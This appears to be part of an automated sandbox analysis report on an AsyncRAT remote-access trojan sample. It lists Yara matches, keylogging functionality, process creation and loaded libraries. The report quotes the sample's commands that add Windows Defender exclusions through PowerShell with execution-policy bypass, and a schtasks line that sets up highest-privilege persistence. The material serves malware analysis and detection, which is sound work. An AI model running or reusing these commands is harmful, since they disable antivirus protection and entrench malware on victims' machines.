                            Source: powershell.exe, 0000000F.00000002.1578558760.0000024CB8384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                            Source: powershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Contains functionality to log keystrokes (.Net Source)
                            Source: 5q4X9fRo4b.exe, XLogger.cs.Net Code: KeyboardLayout
                            Source: SystemUser32.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 5q4X9fRo4b.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE155E0_2_00007FFAACCE155E
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE6A220_2_00007FFAACCE6A22
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE1F410_2_00007FFAACCE1F41
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE5C760_2_00007FFAACCE5C76
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCEE9B80_2_00007FFAACCEE9B8
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCEA3100_2_00007FFAACCEA310
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE57790_2_00007FFAACCE5779
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE1CA10_2_00007FFAACCE1CA1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACDA30E912_2_00007FFAACDA30E9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACDB30E915_2_00007FFAACDB30E9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACDA30E917_2_00007FFAACDA30E9
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 22_2_00007FFAACCD1CA122_2_00007FFAACCD1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 22_2_00007FFAACCD155E22_2_00007FFAACCD155E
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 25_2_00007FFAACCD1CA125_2_00007FFAACCD1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 25_2_00007FFAACCD155E25_2_00007FFAACCD155E
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 26_2_00007FFAACCB1CA126_2_00007FFAACCB1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 26_2_00007FFAACCB155E26_2_00007FFAACCB155E
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 27_2_00007FFAACCD1CA127_2_00007FFAACCD1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 27_2_00007FFAACCD155E27_2_00007FFAACCD155E
                            Source: 5q4X9fRo4b.exe, 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGenesisLoaderCracked.exe4 vs 5q4X9fRo4b.exe
                            Source: 5q4X9fRo4b.exeBinary or memory string: OriginalFilenameGenesisLoaderCracked.exe4 vs 5q4X9fRo4b.exe
                            Source: 5q4X9fRo4b.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 5q4X9fRo4b.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 5q4X9fRo4b.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 5q4X9fRo4b.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 5q4X9fRo4b.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: SystemUser32.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 5q4X9fRo4b.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 5q4X9fRo4b.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/21@1/2
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Roaming\SystemUser32.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeMutant created: \Sessions\1\BaseNamedObjects\ONpGJYzGmp6SrVTn
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                            Source: 5q4X9fRo4b.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 5q4X9fRo4b.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 5q4X9fRo4b.exeReversingLabs: Detection: 84%
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile read: C:\Users\user\Desktop\5q4X9fRo4b.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\5q4X9fRo4b.exe "C:\Users\user\Desktop\5q4X9fRo4b.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SystemUser32.exe C:\Users\user\AppData\Roaming\SystemUser32.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SystemUser32.exe "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SystemUser32.exe C:\Users\user\AppData\Roaming\SystemUser32.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\SystemUser32.exe "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
